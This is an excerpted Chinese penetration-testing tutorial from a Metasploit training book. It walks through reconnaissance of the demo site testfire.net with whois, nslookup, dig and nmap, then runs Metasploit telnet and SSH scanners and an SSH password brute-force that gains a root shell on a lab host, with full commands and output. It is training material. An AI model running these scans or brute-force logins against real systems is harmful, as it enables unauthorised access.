摘自:msf魔鬼训练营
0x00: whois
➜ ~ whois testfire.net
Whois Server Version 2.0
Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.
Domain Name: TESTFIRE.NET
Registrar: CSC CORPORATE DOMAINS, INC.
Sponsoring Registrar IANA ID: 299
Whois Server: whois.corporatedomains.com
Referral URL: http://www.cscglobal.com/global/web/csc/digital-brand-services.html
Name Server: ASIA3.AKAM.NET
Name Server: EUR2.AKAM.NET
Name Server: EUR5.AKAM.NET
Name Server: NS1-206.AKAM.NET
Name Server: NS1-99.AKAM.NET
Name Server: USC2.AKAM.NET
Name Server: USC3.AKAM.NET
Name Server: USW2.AKAM.NET
Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Updated Date: 19-jul-2016
Creation Date: 23-jul-1999
Expiration Date: 23-jul-2017
...
Domain Name: testfire.net
Registry Domain ID: 8363973_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.corporatedomains.com
Registrar URL: www.cscprotectsbrands.com
Updated Date: 2016-07-19T05:24:30Z
Creation Date: 1999-07-23T13:52:32Z
Registrar Registration Expiration Date: 2017-07-23T13:52:32Z
Registrar: CSC CORPORATE DOMAINS, INC.
Registrar IANA ID: 299
Registrar Abuse Contact Email: domainabuse@cscglobal.com
Registrar Abuse Contact Phone: +1.8887802723
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: IBM DNS Admin
Registrant Organization: International Business Machines Corporation
Registrant Street: New Orchard Road
Registrant City: Armonk
Registrant State/Province: NY
Registrant Postal Code: 10504
Registrant Country: US
Registrant Phone: +1.9147654227
Registrant Phone Ext:
Registrant Fax: +1.9147654370
Registrant Fax Ext:
Registrant Email: dnsadm@us.ibm.com
Registry Admin ID:
Admin Name: IBM DNS Admin
Admin Organization: IBM Corporation
Admin Street: New Orchard Road
Admin City: Armonk
Admin State/Province: NY
Admin Postal Code: 10504
Admin Country: US
Admin Phone: +1.9147654227
Admin Phone Ext:
Admin Fax: +1.9147654370
Admin Fax Ext:
Admin Email: dnsadm@us.ibm.com
Registry Tech ID:
Tech Name: IBM DNS Technical
Tech Organization: IBM Corporation
Tech Street: New Orchard Road
Tech City: Armonk
Tech State/Province: NY
Tech Postal Code: 10504
Tech Country: US
Tech Phone: +1.9147654227
Tech Phone Ext:
Tech Fax: +1.9147654370
Tech Fax Ext:
Tech Email: dnstech@us.ibm.com
Name Server: eur2.akam.net
Name Server: ns1-206.akam.net
Name Server: usc3.akam.net
Name Server: usc2.akam.net
Name Server: ns1-99.akam.net
Name Server: usw2.akam.net
Name Server: eur5.akam.net
Name Server: asia3.akam.net
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2016-07-19T05:24:30Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
0x01: nslookup
nslookup 获取DNS服务器保存在cache中的非官方解答的IP地址。
➜ ~ nslookup
> set type=A
> testfire.net
Server: 118.118.118.51
Address: 118.118.118.51#53
Non-authoritative answer:
Name: testfire.net
Address: 65.61.137.117
> exit
0x02: dig
Usage: dig [@global-server] [domain] [q-type] [q-class] {q-opt}
{global-d-opt} host [@local-server] {local-d-opt}
[ host [@local-server] {local-d-opt} […]]
➜ ~ dig @ns.watson.ibm.com testfire.net
; <<>> DiG 9.10.3-P4-Debian <<>> @ns.watson.ibm.com testfire.net
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 1588
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
;; WARNING: recursion requested but not available
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;testfire.net. IN A
;; Query time: 310 msec
;; SERVER: 129.34.20.80#53(129.34.20.80)
;; WHEN: Sun May 21 21:45:36 CST 2017
;; MSG SIZE rcvd: 41
0x03: searchdns.netcraft.com
信息查询服务, 子域名,操作系统类型,服务器地址,域名地址,地理位置
0x04: IP2Loacation
国内: 纯真
国外: https://www.maxmind.com/zh/home
0x05: IP2Domain
国内: 7C
国外: http://www.ip-adress.com/reverse_ip
0x07: 端口扫描和主机发现
MSF:使用arp_sweep 或其他方式扫描
使用Nmap
神器不用多说
官方示例:
EXAMPLES:
nmap -v -A scanme.nmap.org //万能使用方式 -A速度慢
nmap -v -sn 192.168.0.0/16 10.0.0.0/8
nmap -v -iR 10000 -Pn -p 80
使用nmap获取操作系统banner
➜ ~ sudo nmap -O 192.168.1.104
Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-21 23:11 CST
Nmap scan report for bogon (192.168.1.104)
Host is up (0.026s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
5357/tcp open wsdapi
6881/tcp open bittorrent-tracker
MAC Address: 00:25:D3:E0:17:23 (AzureWave Technology)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS details: Microsoft Windows Server 2008 or 2008 Beta 3, Microsoft Windows Server 2008 R2 or Windows 8.1, Microsoft Windows 7 Professional or Windows 8, Microsoft Windows Embedded Standard 7, Microsoft Windows Phone 7.5 or 8.0, Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7, Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.41 seconds
0x08: WEB-INFO 采集
上述方法都是针对域名,系统,地址,位置等信息。此处开始WEB信息采集
–0x0800 dir 网站目录信息采集
google hacking
使用msf 辅助模块
–0x0801 检索特殊文件
–0x0802 特定页面
更多方式参考google hacking 技术手册
0x09网络服务扫描
–0x0900 telnet 服务
由于telnet未加密传输,很不安全,大部分被ssh取代。
msf > use auxiliary/scanner/telnet/telnet_version
msf auxiliary(telnet_version) > set rhosts 10.10.10.0/24
rhosts => 10.10.10.0/24
msf auxiliary(telnet_version) > set threads 100
threads => 100
msf auxiliary(telnet_version) > run
[*] Scanned 028 of 256 hosts (010% complete)
[*] Scanned 078 of 256 hosts (030% complete)
[*] Scanned 097 of 256 hosts (037% complete)
[*] Scanned 105 of 256 hosts (041% complete)
[*] Scanned 132 of 256 hosts (051% complete)
[*] Scanned 171 of 256 hosts (066% complete)
[*] Scanned 197 of 256 hosts (076% complete)
[*] Scanned 206 of 256 hosts (080% complete)
[*] Scanned 233 of 256 hosts (091% complete)
[*] 10.10.10.254:23 TELNET Ubuntu 8.04\x0ametasploitable login:
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
–0x0901 SSH 弱口令
msf auxiliary(ssh_version) > set rhosts 10.10.10.0/24
rhosts => 10.10.10.0/24
msf auxiliary(ssh_version) > set threads 100
threads => 100
msf auxiliary(ssh_version) > run
[*] Scanned 052 of 256 hosts (020% complete)
[*] 10.10.10.129:22, SSH server version: SSH-2.0-OpenSSH_5.3p1 Debian-3ubuntu4
[*] Scanned 065 of 256 hosts (025% complete)
[*] Scanned 100 of 256 hosts (039% complete)
[*] Scanned 104 of 256 hosts (040% complete)
[*] Scanned 147 of 256 hosts (057% complete)
[*] Scanned 179 of 256 hosts (069% complete)
[*] 10.10.10.254:22, SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
[*] Scanned 195 of 256 hosts (076% complete)
[*] Scanned 206 of 256 hosts (080% complete)
[*] Scanned 251 of 256 hosts (098% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_version) > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 10.10.10.129 10.10.10.254
rhosts => 10.10.10.129 10.10.10.254
msf auxiliary(ssh_login) > set threads 50
threads => 50
msf auxiliary(ssh_login) > set username root
username => root
msf auxiliary(ssh_login) > set pass_file /root/pass
pass_file => /root/pass
msf auxiliary(ssh_login) > run
[*] 10.10.10.254:22 SSH - Starting bruteforce
[*] 10.10.10.254:22 SSH - [1/5] - Trying: username: 'root' with password: ''
[*] 10.10.10.129:22 SSH - Starting bruteforce
[*] 10.10.10.129:22 SSH - [1/5] - Trying: username: 'root' with password: ''
[-] 10.10.10.254:22 SSH - [1/5] - Failed: 'root':''
[*] 10.10.10.254:22 SSH - [2/5] - Trying: username: 'ling' with password: ''
[-] 10.10.10.129:22 SSH - [1/5] - Failed: 'root':''
[*] 10.10.10.129:22 SSH - [2/5] - Trying: username: 'ling' with password: ''
[-] 10.10.10.254:22 SSH - [2/5] - Failed: 'ling':''
[*] 10.10.10.254:22 SSH - [3/5] - Trying: username: 'root' with password: 'root'
[-] 10.10.10.129:22 SSH - [2/5] - Failed: 'ling':''
[*] 10.10.10.129:22 SSH - [3/5] - Trying: username: 'root' with password: 'root'
[-] 10.10.10.254:22 SSH - [3/5] - Failed: 'root':'root'
[*] 10.10.10.254:22 SSH - [4/5] - Trying: username: 'ling' with password: 'ling'
[-] 10.10.10.129:22 SSH - [3/5] - Failed: 'root':'root'
[*] 10.10.10.129:22 SSH - [4/5] - Trying: username: 'ling' with password: 'ling'
[-] 10.10.10.254:22 SSH - [4/5] - Failed: 'ling':'ling'
[*] 10.10.10.254:22 SSH - [5/5] - Trying: username: 'root' with password: 'ling'
[-] 10.10.10.254:22 SSH - [5/5] - Failed: 'root':'ling'
[-] 10.10.10.129:22 SSH - [4/5] - Failed: 'ling':'ling'
[*] 10.10.10.129:22 SSH - [5/5] - Trying: username: 'root' with password: 'ling'
[*] Command shell session 1 opened (10.10.10.131:43480 -> 10.10.10.129:22) at 2017-05-21 21:45:18 -0400
[+] 10.10.10.129:22 SSH - [5/5] - Success: 'root':'ling' 'uid=0(root) gid=0(root) groups=0(root) Linux owaspbwa 2.6.32-25-generic-pae #44-Ubuntu SMP Fri Sep 17 21:57:48 UTC 2010 i686 GNU/Linux '
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
0x0A 使用漏洞扫描器
OpenVAS